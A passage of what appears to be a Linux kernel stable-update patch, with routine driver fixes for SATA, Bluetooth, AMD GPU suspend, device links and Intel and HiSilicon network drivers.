+-	{ PCI_VDEVICE(MARVELL, 0x5080), chip_5080 },
+-	{ PCI_VDEVICE(MARVELL, 0x5081), chip_508x },
+-	/* RocketRAID 1720/174x have different identifiers */
+-	{ PCI_VDEVICE(TTI, 0x1720), chip_6042 },
+-	{ PCI_VDEVICE(TTI, 0x1740), chip_6042 },
+-	{ PCI_VDEVICE(TTI, 0x1742), chip_6042 },
+-
+-	{ PCI_VDEVICE(MARVELL, 0x6040), chip_604x },
+-	{ PCI_VDEVICE(MARVELL, 0x6041), chip_604x },
+-	{ PCI_VDEVICE(MARVELL, 0x6042), chip_6042 },
+-	{ PCI_VDEVICE(MARVELL, 0x6080), chip_608x },
+-	{ PCI_VDEVICE(MARVELL, 0x6081), chip_608x },
+-
+-	{ PCI_VDEVICE(ADAPTEC2, 0x0241), chip_604x },
+-
+-	/* Adaptec 1430SA */
+-	{ PCI_VDEVICE(ADAPTEC2, 0x0243), chip_7042 },
+-
+-	/* Marvell 7042 support */
+-	{ PCI_VDEVICE(MARVELL, 0x7042), chip_7042 },
+-
+-	/* Highpoint RocketRAID PCIe series */
+-	{ PCI_VDEVICE(TTI, 0x2300), chip_7042 },
+-	{ PCI_VDEVICE(TTI, 0x2310), chip_7042 },
+-
+-	{ }			/* terminate list */
+-};
+-
+ static const struct mv_hw_ops mv5xxx_ops = {
+ 	.phy_errata		= mv5_phy_errata,
+ 	.enable_leds		= mv5_enable_leds,
+@@ -4301,6 +4270,36 @@ static int mv_pci_init_one(struct pci_dev *pdev,
+ static int mv_pci_device_resume(struct pci_dev *pdev);
+ #endif
+ 
++static const struct pci_device_id mv_pci_tbl[] = {
++	{ PCI_VDEVICE(MARVELL, 0x5040), chip_504x },
++	{ PCI_VDEVICE(MARVELL, 0x5041), chip_504x },
++	{ PCI_VDEVICE(MARVELL, 0x5080), chip_5080 },
++	{ PCI_VDEVICE(MARVELL, 0x5081), chip_508x },
++	/* RocketRAID 1720/174x have different identifiers */
++	{ PCI_VDEVICE(TTI, 0x1720), chip_6042 },
++	{ PCI_VDEVICE(TTI, 0x1740), chip_6042 },
++	{ PCI_VDEVICE(TTI, 0x1742), chip_6042 },
++
++	{ PCI_VDEVICE(MARVELL, 0x6040), chip_604x },
++	{ PCI_VDEVICE(MARVELL, 0x6041), chip_604x },
++	{ PCI_VDEVICE(MARVELL, 0x6042), chip_6042 },
++	{ PCI_VDEVICE(MARVELL, 0x6080), chip_608x },
++	{ PCI_VDEVICE(MARVELL, 0x6081), chip_608x },
++
++	{ PCI_VDEVICE(ADAPTEC2, 0x0241), chip_604x },
++
++	/* Adaptec 1430SA */
++	{ PCI_VDEVICE(ADAPTEC2, 0x0243), chip_7042 },
++
++	/* Marvell 7042 support */
++	{ PCI_VDEVICE(MARVELL, 0x7042), chip_7042 },
++
++	/* Highpoint RocketRAID PCIe series */
++	{ PCI_VDEVICE(TTI, 0x2300), chip_7042 },
++	{ PCI_VDEVICE(TTI, 0x2310), chip_7042 },
++
++	{ }			/* terminate list */
++};
+ 
+ static struct pci_driver mv_pci_driver = {
+ 	.name			= DRV_NAME,
+@@ -4313,6 +4312,7 @@ static struct pci_driver mv_pci_driver = {
+ #endif
+ 
+ };
++MODULE_DEVICE_TABLE(pci, mv_pci_tbl);
+ 
+ /**
+  *      mv_print_info - Dump key info to kernel log for perusal.
+@@ -4485,7 +4485,6 @@ static void __exit mv_exit(void)
+ MODULE_AUTHOR("Brett Russ");
+ MODULE_DESCRIPTION("SCSI low-level driver for Marvell SATA controllers");
+ MODULE_LICENSE("GPL v2");
+-MODULE_DEVICE_TABLE(pci, mv_pci_tbl);
+ MODULE_VERSION(DRV_VERSION);
+ MODULE_ALIAS("platform:" DRV_NAME);
+ 
+diff --git a/drivers/ata/sata_sx4.c b/drivers/ata/sata_sx4.c
+index 6ceec59cb2913..fa1966638c060 100644
+--- a/drivers/ata/sata_sx4.c
++++ b/drivers/ata/sata_sx4.c
+@@ -958,8 +958,7 @@ static void pdc20621_get_from_dimm(struct ata_host *host, void *psource,
+ 
+ 	offset -= (idx * window_size);
+ 	idx++;
+-	dist = ((long) (window_size - (offset + size))) >= 0 ? size :
+-		(long) (window_size - offset);
++	dist = min(size, window_size - offset);
+ 	memcpy_fromio(psource, dimm_mmio + offset / 4, dist);
+ 
+ 	psource += dist;
+@@ -1006,8 +1005,7 @@ static void pdc20621_put_to_dimm(struct ata_host *host, void *psource,
+ 	readl(mmio + PDC_DIMM_WINDOW_CTLR);
+ 	offset -= (idx * window_size);
+ 	idx++;
+-	dist = ((long)(s32)(window_size - (offset + size))) >= 0 ? size :
+-		(long) (window_size - offset);
++	dist = min(size, window_size - offset);
+ 	memcpy_toio(dimm_mmio + offset / 4, psource, dist);
+ 	writel(0x01, mmio + PDC_GENERAL_CTLR);
+ 	readl(mmio + PDC_GENERAL_CTLR);
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index 3078f44dc1861..8d87808cdb8aa 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -56,6 +56,7 @@ static bool fw_devlink_is_permissive(void);
+ static void __fw_devlink_link_to_consumers(struct device *dev);
+ static bool fw_devlink_drv_reg_done;
+ static bool fw_devlink_best_effort;
++static struct workqueue_struct *device_link_wq;
+ 
+ /**
+  * __fwnode_link_add - Create a link between two fwnode_handles.
+@@ -585,12 +586,26 @@ static void devlink_dev_release(struct device *dev)
+ 	/*
+ 	 * It may take a while to complete this work because of the SRCU
+ 	 * synchronization in device_link_release_fn() and if the consumer or
+-	 * supplier devices get deleted when it runs, so put it into the "long"
+-	 * workqueue.
++	 * supplier devices get deleted when it runs, so put it into the
++	 * dedicated workqueue.
+ 	 */
+-	queue_work(system_long_wq, &link->rm_work);
++	queue_work(device_link_wq, &link->rm_work);
+ }
+ 
++/**
++ * device_link_wait_removal - Wait for ongoing devlink removal jobs to terminate
++ */
++void device_link_wait_removal(void)
++{
++	/*
++	 * devlink removal jobs are queued in the dedicated work queue.
++	 * To be sure that all removal jobs are terminated, ensure that any
++	 * scheduled work has run to completion.
++	 */
++	flush_workqueue(device_link_wq);
++}
++EXPORT_SYMBOL_GPL(device_link_wait_removal);
++
+ static struct class devlink_class = {
+ 	.name = "devlink",
+ 	.owner = THIS_MODULE,
+@@ -4132,9 +4147,14 @@ int __init devices_init(void)
+ 	sysfs_dev_char_kobj = kobject_create_and_add("char", dev_kobj);
+ 	if (!sysfs_dev_char_kobj)
+ 		goto char_kobj_err;
++	device_link_wq = alloc_workqueue("device_link_wq", 0, 0);
++	if (!device_link_wq)
++		goto wq_err;
+ 
+ 	return 0;
+ 
++ wq_err:
++	kobject_put(sysfs_dev_char_kobj);
+  char_kobj_err:
+ 	kobject_put(sysfs_dev_block_kobj);
+  block_kobj_err:
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index 0211f704a358b..5277090c6d6d7 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -758,11 +758,15 @@ EXPORT_SYMBOL_GPL(qca_uart_setup);
+ 
+ int qca_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+ {
++	bdaddr_t bdaddr_swapped;
+ 	struct sk_buff *skb;
+ 	int err;
+ 
+-	skb = __hci_cmd_sync_ev(hdev, EDL_WRITE_BD_ADDR_OPCODE, 6, bdaddr,
+-				HCI_EV_VENDOR, HCI_INIT_TIMEOUT);
++	baswap(&bdaddr_swapped, bdaddr);
++
++	skb = __hci_cmd_sync_ev(hdev, EDL_WRITE_BD_ADDR_OPCODE, 6,
++				&bdaddr_swapped, HCI_EV_VENDOR,
++				HCI_INIT_TIMEOUT);
+ 	if (IS_ERR(skb)) {
+ 		err = PTR_ERR(skb);
+ 		bt_dev_err(hdev, "QCA Change address cmd failed (%d)", err);
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 2acda547f4f3e..33956ddec9337 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -7,7 +7,6 @@
+  *
+  *  Copyright (C) 2007 Texas Instruments, Inc.
+  *  Copyright (c) 2010, 2012, 2018 The Linux Foundation. All rights reserved.
+- *  Copyright (c) 2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  *
+  *  Acknowledgements:
+  *  This file is based on hci_ll.c, which was...
+@@ -226,6 +225,7 @@ struct qca_serdev {
+ 	struct qca_power *bt_power;
+ 	u32 init_speed;
+ 	u32 oper_speed;
++	bool bdaddr_property_broken;
+ 	const char *firmware_name;
+ };
+ 
+@@ -1788,6 +1788,7 @@ static int qca_setup(struct hci_uart *hu)
+ 	const char *firmware_name = qca_get_firmware_name(hu);
+ 	int ret;
+ 	struct qca_btsoc_version ver;
++	struct qca_serdev *qcadev;
+ 	const char *soc_name;
+ 
+ 	ret = qca_check_speeds(hu);
+@@ -1845,16 +1846,11 @@ static int qca_setup(struct hci_uart *hu)
+ 	case QCA_WCN6750:
+ 	case QCA_WCN6855:
+ 	case QCA_WCN7850:
++		set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
+ 
+-		/* Set BDA quirk bit for reading BDA value from fwnode property
+-		 * only if that property exist in DT.
+-		 */
+-		if (fwnode_property_present(dev_fwnode(hdev->dev.parent), "local-bd-address")) {
+-			set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
+-			bt_dev_info(hdev, "setting quirk bit to read BDA from fwnode later");
+-		} else {
+-			bt_dev_dbg(hdev, "local-bd-address` is not present in the devicetree so not setting quirk bit for BDA");
+-		}
++		qcadev = serdev_device_get_drvdata(hu->serdev);
++		if (qcadev->bdaddr_property_broken)
++			set_bit(HCI_QUIRK_BDADDR_PROPERTY_BROKEN, &hdev->quirks);
+ 
+ 		hci_set_aosp_capable(hdev);
+ 
+@@ -2223,6 +2219,9 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 	if (!qcadev->oper_speed)
+ 		BT_DBG("UART will pick default operating speed");
+ 
++	qcadev->bdaddr_property_broken = device_property_read_bool(&serdev->dev,
++			"qcom,local-bd-address-broken");
++
+ 	if (data)
+ 		qcadev->btsoc_type = data->soc_type;
+ 	else
+diff --git a/drivers/dma-buf/st-dma-fence-chain.c b/drivers/dma-buf/st-dma-fence-chain.c
+index 0a9b099d05187..d90479d830fc3 100644
+--- a/drivers/dma-buf/st-dma-fence-chain.c
++++ b/drivers/dma-buf/st-dma-fence-chain.c
+@@ -84,11 +84,11 @@ static int sanitycheck(void *arg)
+ 		return -ENOMEM;
+ 
+ 	chain = mock_chain(NULL, f, 1);
+-	if (!chain)
++	if (chain)
++		dma_fence_enable_sw_signaling(chain);
++	else
+ 		err = -ENOMEM;
+ 
+-	dma_fence_enable_sw_signaling(chain);
+-
+ 	dma_fence_signal(f);
+ 	dma_fence_put(f);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index e636c7850f777..dd22d2559720c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1342,6 +1342,7 @@ void amdgpu_driver_postclose_kms(struct drm_device *dev,
+ void amdgpu_driver_release_kms(struct drm_device *dev);
+ 
+ int amdgpu_device_ip_suspend(struct amdgpu_device *adev);
++int amdgpu_device_prepare(struct drm_device *dev);
+ int amdgpu_device_suspend(struct drm_device *dev, bool fbcon);
+ int amdgpu_device_resume(struct drm_device *dev, bool fbcon);
+ u32 amdgpu_get_vblank_counter_kms(struct drm_crtc *crtc);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 6a4749c0c5a58..b11690a816e73 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1639,6 +1639,7 @@ static void amdgpu_switcheroo_set_state(struct pci_dev *pdev,
+ 	} else {
+ 		pr_info("switched off\n");
+ 		dev->switch_power_state = DRM_SWITCH_POWER_CHANGING;
++		amdgpu_device_prepare(dev);
+ 		amdgpu_device_suspend(dev, true);
+ 		amdgpu_device_cache_pci_state(pdev);
+ 		/* Shut down the device */
+@@ -4167,6 +4168,43 @@ static int amdgpu_device_evict_resources(struct amdgpu_device *adev)
+ /*
+  * Suspend & resume.
+  */
++/**
++ * amdgpu_device_prepare - prepare for device suspend
++ *
++ * @dev: drm dev pointer
++ *
++ * Prepare to put the hw in the suspend state (all asics).
++ * Returns 0 for success or an error on failure.
++ * Called at driver suspend.
++ */
++int amdgpu_device_prepare(struct drm_device *dev)
++{
++	struct amdgpu_device *adev = drm_to_adev(dev);
++	int i, r;
++
++	if (dev->switch_power_state == DRM_SWITCH_POWER_OFF)
++		return 0;
++
++	/* Evict the majority of BOs before starting suspend sequence */
++	r = amdgpu_device_evict_resources(adev);
++	if (r)
++		return r;
++
++	flush_delayed_work(&adev->gfx.gfx_off_delay_work);
++
++	for (i = 0; i < adev->num_ip_blocks; i++) {
++		if (!adev->ip_blocks[i].status.valid)
++			continue;
++		if (!adev->ip_blocks[i].version->funcs->prepare_suspend)
++			continue;
++		r = adev->ip_blocks[i].version->funcs->prepare_suspend((void *)adev);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ /**
+  * amdgpu_device_suspend - initiate device suspend
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index f24c3a20e901d..9a5416331f02e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2391,8 +2391,9 @@ static int amdgpu_pmops_prepare(struct device *dev)
+ 	/* Return a positive number here so
+ 	 * DPM_FLAG_SMART_SUSPEND works properly
+ 	 */
+-	if (amdgpu_device_supports_boco(drm_dev))
+-		return pm_runtime_suspended(dev);
++	if (amdgpu_device_supports_boco(drm_dev) &&
++	    pm_runtime_suspended(dev))
++		return 1;
+ 
+ 	/* if we will not support s3 or s2i for the device
+ 	 *  then skip suspend
+@@ -2401,7 +2402,7 @@ static int amdgpu_pmops_prepare(struct device *dev)
+ 	    !amdgpu_acpi_is_s3_active(adev))
+ 		return 1;
+ 
+-	return 0;
++	return amdgpu_device_prepare(drm_dev);
+ }
+ 
+ static void amdgpu_pmops_complete(struct device *dev)
+@@ -2600,6 +2601,9 @@ static int amdgpu_pmops_runtime_suspend(struct device *dev)
+ 	if (amdgpu_device_supports_boco(drm_dev))
+ 		adev->mp1_state = PP_MP1_STATE_UNLOAD;
+ 
++	ret = amdgpu_device_prepare(drm_dev);
++	if (ret)
++		return ret;
+ 	ret = amdgpu_device_suspend(drm_dev, false);
+ 	if (ret) {
+ 		adev->in_runpm = false;
+diff --git a/drivers/gpu/drm/amd/include/amd_shared.h b/drivers/gpu/drm/amd/include/amd_shared.h
+index f175e65b853a0..34467427c9f97 100644
+--- a/drivers/gpu/drm/amd/include/amd_shared.h
++++ b/drivers/gpu/drm/amd/include/amd_shared.h
+@@ -294,6 +294,7 @@ struct amd_ip_funcs {
+ 	int (*hw_init)(void *handle);
+ 	int (*hw_fini)(void *handle);
+ 	void (*late_fini)(void *handle);
++	int (*prepare_suspend)(void *handle);
+ 	int (*suspend)(void *handle);
+ 	int (*resume)(void *handle);
+ 	bool (*is_idle)(void *handle);
+diff --git a/drivers/gpu/drm/panfrost/panfrost_gpu.c b/drivers/gpu/drm/panfrost/panfrost_gpu.c
+index 55d2430485168..40b6314459926 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_gpu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_gpu.c
+@@ -379,19 +379,19 @@ void panfrost_gpu_power_off(struct panfrost_device *pfdev)
+ 
+ 	gpu_write(pfdev, SHADER_PWROFF_LO, pfdev->features.shader_present);
+ 	ret = readl_relaxed_poll_timeout(pfdev->iomem + SHADER_PWRTRANS_LO,
+-					 val, !val, 1, 1000);
++					 val, !val, 1, 2000);
+ 	if (ret)
+ 		dev_err(pfdev->dev, "shader power transition timeout");
+ 
+ 	gpu_write(pfdev, TILER_PWROFF_LO, pfdev->features.tiler_present);
+ 	ret = readl_relaxed_poll_timeout(pfdev->iomem + TILER_PWRTRANS_LO,
+-					 val, !val, 1, 1000);
++					 val, !val, 1, 2000);
+ 	if (ret)
+ 		dev_err(pfdev->dev, "tiler power transition timeout");
+ 
+ 	gpu_write(pfdev, L2_PWROFF_LO, pfdev->features.l2_present);
+ 	ret = readl_poll_timeout(pfdev->iomem + L2_PWRTRANS_LO,
+-				 val, !val, 0, 1000);
++				 val, !val, 0, 2000);
+ 	if (ret)
+ 		dev_err(pfdev->dev, "l2 power transition timeout");
+ }
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 9c9e2b50c63c3..696365f8f3b5f 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -4167,7 +4167,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv
+ 		} else if (sscanf(opt_string, "sectors_per_bit:%llu%c", &llval, &dummy) == 1) {
+ 			log2_sectors_per_bitmap_bit = !llval ? 0 : __ilog2_u64(llval);
+ 		} else if (sscanf(opt_string, "bitmap_flush_interval:%u%c", &val, &dummy) == 1) {
+-			if (val >= (uint64_t)UINT_MAX * 1000 / HZ) {
++			if ((uint64_t)val >= (uint64_t)UINT_MAX * 1000 / HZ) {
+ 				r = -EINVAL;
+ 				ti->error = "Invalid bitmap_flush_interval argument";
+ 				goto bad;
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 97d12c7eea772..ebff14b0837d9 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -2236,8 +2236,6 @@ static int fec_enet_mii_probe(struct net_device *ndev)
+ 	fep->link = 0;
+ 	fep->full_duplex = 0;
+ 
+-	phy_dev->mac_managed_pm = 1;
+-
+ 	phy_attached_info(phy_dev);
+ 
+ 	return 0;
+@@ -2249,10 +2247,12 @@ static int fec_enet_mii_init(struct platform_device *pdev)
+ 	struct net_device *ndev = platform_get_drvdata(pdev);
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+ 	bool suppress_preamble = false;
++	struct phy_device *phydev;
+ 	struct device_node *node;
+ 	int err = -ENXIO;
+ 	u32 mii_speed, holdtime;
+ 	u32 bus_freq;
++	int addr;
+ 
+ 	/*
+ 	 * The i.MX28 dual fec interfaces are not equal.
+@@ -2362,6 +2362,13 @@ static int fec_enet_mii_init(struct platform_device *pdev)
+ 		goto err_out_free_mdiobus;
+ 	of_node_put(node);
+ 
++	/* find all the PHY devices on the bus and set mac_managed_pm to true */
++	for (addr = 0; addr < PHY_MAX_ADDR; addr++) {
++		phydev = mdiobus_get_phy(fep->mii_bus, addr);
++		if (phydev)
++			phydev->mac_managed_pm = true;
++	}
++
+ 	mii_cnt++;
+ 
+ 	/* save fec0 mii_bus */
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_tqp_stats.c b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_tqp_stats.c
+index f3c9395d8351c..618f66d9586b3 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_tqp_stats.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_tqp_stats.c
+@@ -85,7 +85,7 @@ int hclge_comm_tqps_update_stats(struct hnae3_handle *handle,
+ 		hclge_comm_cmd_setup_basic_desc(&desc, HCLGE_OPC_QUERY_TX_STATS,
+ 						true);
+ 
+-		desc.data[0] = cpu_to_le32(tqp->index & 0x1ff);
++		desc.data[0] = cpu_to_le32(tqp->index);
+ 		ret = hclge_comm_cmd_send(hw, &desc, 1);
+ 		if (ret) {
+ 			dev_err(&hw->cmq.csq.pdev->dev,
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c b/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
+index e22835ae8a941..9fce976a08f01 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
+@@ -78,6 +78,9 @@ static const struct hns3_stats hns3_rxq_stats[] = {
+ #define HNS3_NIC_LB_TEST_NO_MEM_ERR	1
+ #define HNS3_NIC_LB_TEST_TX_CNT_ERR	2
+ #define HNS3_NIC_LB_TEST_RX_CNT_ERR	3
++#define HNS3_NIC_LB_TEST_UNEXECUTED	4
++
++static int hns3_get_sset_count(struct net_device *netdev, int stringset);
+ 
+ static int hns3_lp_setup(struct net_device *ndev, enum hnae3_loop loop, bool en)
+ {
+@@ -419,18 +422,26 @@ static void hns3_do_external_lb(struct net_device *ndev,
+ static void hns3_self_test(struct net_device *ndev,
+ 			   struct ethtool_test *eth_test, u64 *data)
+ {
++	int cnt = hns3_get_sset_count(ndev, ETH_SS_TEST);
+ 	struct hns3_nic_priv *priv = netdev_priv(ndev);
+ 	struct hnae3_handle *h = priv->ae_handle;
+ 	int st_param[HNAE3_LOOP_NONE][2];
+ 	bool if_running = netif_running(ndev);
++	int i;
++
++	/* initialize the loopback test result, avoid marking an unexcuted
++	 * loopback test as PASS.
++	 */
++	for (i = 0; i < cnt; i++)
++		data[i] = HNS3_NIC_LB_TEST_UNEXECUTED;
+ 
+ 	if (hns3_nic_resetting(ndev)) {
+ 		netdev_err(ndev, "dev resetting!");
+-		return;
++		goto failure;
+ 	}
+ 
+ 	if (!(eth_test->flags & ETH_TEST_FL_OFFLINE))
+-		return;
++		goto failure;
+ 
+ 	if (netif_msg_ifdown(h))
+ 		netdev_info(ndev, "self test start\n");
+@@ -452,6 +463,10 @@ static void hns3_self_test(struct net_device *ndev,
+ 
+ 	if (netif_msg_ifdown(h))
+ 		netdev_info(ndev, "self test end\n");
++	return;
++
++failure:
++	eth_test->flags |= ETH_TEST_FL_FAILED;
+ }
+ 
+ static void hns3_update_limit_promisc_mode(struct net_device *netdev,
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 27037ce795902..9db363fbc34fd 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -11604,6 +11604,8 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 	if (ret)
+ 		goto err_pci_uninit;
+ 
++	devl_lock(hdev->devlink);
++
+ 	/* Firmware command queue initialize */
+ 	ret = hclge_comm_cmd_queue_init(hdev->pdev, &hdev->hw.hw);
+ 	if (ret)
+@@ -11778,6 +11780,7 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 
+ 	hclge_task_schedule(hdev, round_jiffies_relative(HZ));
+ 
++	devl_unlock(hdev->devlink);
+ 	return 0;
+ 
+ err_mdiobus_unreg:
+@@ -11790,6 +11793,7 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ err_cmd_uninit:
+ 	hclge_comm_cmd_uninit(hdev->ae_dev, &hdev->hw.hw);
+ err_devlink_uninit:
++	devl_unlock(hdev->devlink);
+ 	hclge_devlink_uninit(hdev);
+ err_pci_uninit:
+ 	pcim_iounmap(pdev, hdev->hw.hw.io_base);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h
+index 7d4cc4eafd59e..5293fc00938cf 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e.h
++++ b/drivers/net/ethernet/intel/i40e/i40e.h
+@@ -108,7 +108,7 @@
+ #define I40E_MAX_BW_INACTIVE_ACCUM	4 /* accumulate 4 credits max */
+ 
+ /* driver state flags */
+-enum i40e_state_t {
++enum i40e_state {
+ 	__I40E_TESTING,
+ 	__I40E_CONFIG_BUSY,
+ 	__I40E_CONFIG_DONE,
+@@ -156,7 +156,7 @@ enum i40e_state_t {
+ 	BIT_ULL(__I40E_PF_RESET_AND_REBUILD_REQUESTED)
+ 
+ /* VSI state flags */
+-enum i40e_vsi_state_t {
++enum i40e_vsi_state {
+ 	__I40E_VSI_DOWN,
+ 	__I40E_VSI_NEEDS_RESTART,
+ 	__I40E_VSI_SYNCING_FILTERS,
+@@ -992,6 +992,8 @@ struct i40e_q_vector {
+ 	struct rcu_head rcu;	/* to avoid race with update stats on free */
+ 	char name[I40E_INT_NAME_STR_LEN];
+ 	bool arm_wb_state;
++	bool in_busy_poll;
++	int irq_num;		/* IRQ assigned to this q_vector */
+ } ____cacheline_internodealigned_in_smp;
+ 
+ /* lan device */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index d8a7fb21b7b76..a9db1ed74d3fc 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -1249,8 +1249,11 @@ int i40e_count_filters(struct i40e_vsi *vsi)
+ 	int bkt;
+ 	int cnt = 0;
+ 
+-	hash_for_each_safe(vsi->mac_filter_hash, bkt, h, f, hlist)
+-		++cnt;
++	hash_for_each_safe(vsi->mac_filter_hash, bkt, h, f, hlist) {
++		if (f->state == I40E_FILTER_NEW ||
++		    f->state == I40E_FILTER_ACTIVE)
++			++cnt;
++	}
+ 
+ 	return cnt;
+ }
+@@ -3888,6 +3891,12 @@ static void i40e_vsi_configure_msix(struct i40e_vsi *vsi)
+ 		     q_vector->tx.target_itr >> 1);
+ 		q_vector->tx.current_itr = q_vector->tx.target_itr;
+ 
++		/* Set ITR for software interrupts triggered after exiting
++		 * busy-loop polling.
++		 */
++		wr32(hw, I40E_PFINT_ITRN(I40E_SW_ITR, vector - 1),
++		     I40E_ITR_20K);
++
+ 		wr32(hw, I40E_PFINT_RATEN(vector - 1),
+ 		     i40e_intrl_usec_to_reg(vsi->int_rate_limit));
+ 
+@@ -4142,6 +4151,7 @@ static int i40e_vsi_request_irq_msix(struct i40e_vsi *vsi, char *basename)
+ 		}
+ 
+ 		/* register for affinity change notifications */
++		q_vector->irq_num = irq_num;
+ 		q_vector->affinity_notify.notify = i40e_irq_affinity_notify;
+ 		q_vector->affinity_notify.release = i40e_irq_affinity_release;
+ 		irq_set_affinity_notifier(irq_num, &q_vector->affinity_notify);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ptp.c b/drivers/net/ethernet/intel/i40e/i40e_ptp.c
+index 97a9efe7b713e..5f2555848a69e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ptp.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ptp.c
+@@ -34,7 +34,7 @@ enum i40e_ptp_pin {
+ 	GPIO_4
+ };
+ 
+-enum i40e_can_set_pins_t {
++enum i40e_can_set_pins {
+ 	CANT_DO_PINS = -1,
+ 	CAN_SET_PINS,
+ 	CAN_DO_PINS
+@@ -192,7 +192,7 @@ static bool i40e_is_ptp_pin_dev(struct i40e_hw *hw)
+  * return CAN_DO_PINS if pins can be manipulated within a NIC or
+  * return CANT_DO_PINS otherwise.
+  **/
+-static enum i40e_can_set_pins_t i40e_can_set_pins(struct i40e_pf *pf)
++static enum i40e_can_set_pins i40e_can_set_pins(struct i40e_pf *pf)
+ {
+ 	if (!i40e_is_ptp_pin_dev(&pf->hw)) {
+ 		dev_warn(&pf->pdev->dev,
+@@ -1081,7 +1081,7 @@ static void i40e_ptp_set_pins_hw(struct i40e_pf *pf)
+ static int i40e_ptp_set_pins(struct i40e_pf *pf,
+ 			     struct i40e_ptp_pins_settings *pins)
+ {
+-	enum i40e_can_set_pins_t pin_caps = i40e_can_set_pins(pf);
++	enum i40e_can_set_pins pin_caps = i40e_can_set_pins(pf);
+ 	int i = 0;
+ 
+ 	if (pin_caps == CANT_DO_PINS)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_register.h b/drivers/net/ethernet/intel/i40e/i40e_register.h
+index 7339003aa17cd..694cb3e45c1ec 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_register.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_register.h
+@@ -328,8 +328,11 @@
+ #define I40E_PFINT_DYN_CTLN_ITR_INDX_SHIFT 3
+ #define I40E_PFINT_DYN_CTLN_ITR_INDX_MASK I40E_MASK(0x3, I40E_PFINT_DYN_CTLN_ITR_INDX_SHIFT)
+ #define I40E_PFINT_DYN_CTLN_INTERVAL_SHIFT 5
++#define I40E_PFINT_DYN_CTLN_INTERVAL_MASK I40E_MASK(0xFFF, I40E_PFINT_DYN_CTLN_INTERVAL_SHIFT)
+ #define I40E_PFINT_DYN_CTLN_SW_ITR_INDX_ENA_SHIFT 24
+ #define I40E_PFINT_DYN_CTLN_SW_ITR_INDX_ENA_MASK I40E_MASK(0x1, I40E_PFINT_DYN_CTLN_SW_ITR_INDX_ENA_SHIFT)
++#define I40E_PFINT_DYN_CTLN_SW_ITR_INDX_SHIFT 25
++#define I40E_PFINT_DYN_CTLN_SW_ITR_INDX_MASK I40E_MASK(0x3, I40E_PFINT_DYN_CTLN_SW_ITR_INDX_SHIFT)
+ #define I40E_PFINT_ICR0 0x00038780 /* Reset: CORER */
+ #define I40E_PFINT_ICR0_INTEVENT_SHIFT 0
